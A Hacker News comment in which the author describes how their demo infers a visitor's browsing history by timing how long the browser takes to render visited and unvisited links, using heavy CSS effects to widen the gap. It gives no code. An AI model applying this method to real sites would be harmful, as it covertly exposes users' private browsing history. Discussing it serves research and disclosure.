Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I'm measuring the time it takes for the browser to render a known visited link (this page) and a known not visited link (random url). Then after it calibrates itself it goes through every link in the list and measures the time it took for the browser to render it. The bigger the time, the bigger chance the link was visited. It then loosely compares the times against the calibration values. It also uses some advanced css techniques to slow down the browser, like having a large box shadow and opacity. All links are hidden with opacity and absolute positioning but it's technically still visible so the browser does render it.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: